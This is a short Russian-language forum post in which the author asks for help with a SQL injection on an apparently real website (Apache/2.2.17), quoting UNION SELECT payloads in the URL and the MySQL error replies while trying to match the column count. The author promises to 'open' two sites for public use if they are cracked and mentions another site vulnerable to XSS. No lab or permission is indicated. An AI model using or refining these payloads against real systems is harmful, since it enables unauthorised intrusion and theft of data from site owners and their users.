Прошу помощи

инъекция вида:

index/page/id/1'+union+select+1,2,3,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,

ответ:

Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

И далее плохая новость ничего не выходит с числами, сколько бы не подставлял.

Но есть и хорошая

index/page/id/1'+union+select+1,2,3,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0'

в конце кавычка и ответ уже:

Invalid query: The used SELECT statements have a different number of columns

Только вот теперь опять затык. Два сайта если вскроем на общее пользование вынесу.

+ сайт с xss есть но об этом позже =)

если что сайт на Apache/2.2.17